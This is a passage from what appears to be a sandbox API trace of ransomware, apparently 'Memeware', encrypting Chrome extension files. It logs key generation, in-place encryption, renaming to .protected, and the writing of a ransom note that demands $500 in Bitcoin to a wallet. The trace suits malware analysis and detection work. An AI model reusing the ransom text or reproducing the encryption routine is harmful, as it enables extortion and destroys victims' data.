Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json") returned 155 [0081.492] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json") returned 155 [0081.492] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.492] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0081.492] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.493] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0081.493] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.493] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.493] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.493] CloseHandle (hObject=0x168) returned 1 [0081.493] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.protected") returned 165 [0081.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.protected")) returned 1 [0081.494] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.494] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.494] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\RESTORE_FILES.txt") returned 159 [0081.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.494] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.494] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.495] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.495] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.495] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.495] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.495] CloseHandle (hObject=0x164) returned 1 [0081.495] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.495] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0081.495] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0081.495] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0081.495] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0081.495] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0081.495] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl") returned 141 [0081.495] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0081.495] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0081.495] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\*") returned 143 [0081.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.496] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.496] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.496] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.496] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.496] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.497] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\.") returned 143 [0081.497] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.497] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.497] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.497] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.497] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.497] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.497] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.497] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\..") returned 144 [0081.497] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.497] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.497] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.497] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.497] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.497] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.497] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.497] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.497] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json") returned 155 [0081.497] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.497] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.497] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.497] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.498] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json") returned 155 [0081.498] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.498] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json") returned 155 [0081.498] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.498] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json") returned 155 [0081.498] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.498] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0081.498] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.499] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0081.499] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.499] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.499] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.499] CloseHandle (hObject=0x168) returned 1 [0081.499] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.protected") returned 165 [0081.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.protected")) returned 1 [0081.500] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.500] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\RESTORE_FILES.txt") returned 159 [0081.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.500] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.500] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.501] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.501] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.501] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.501] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.501] CloseHandle (hObject=0x164) returned 1 [0081.501] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.501] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0081.501] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0081.501] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0081.501] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0081.501] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0081.502] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR") returned 144 [0081.502] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0081.502] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0081.502] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\*") returned 146 [0081.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.503] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.503] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.503] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.503] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.503] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.503] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\.") returned 146 [0081.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.503] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.503] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.503] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.503] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.503] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.503] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.503] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\..") returned 147 [0081.503] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.503] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.503] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.503] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0081.503] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.503] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.503] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.503] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.503] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0081.503] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.503] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.503] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.503] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.504] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0081.504] StrStrW 
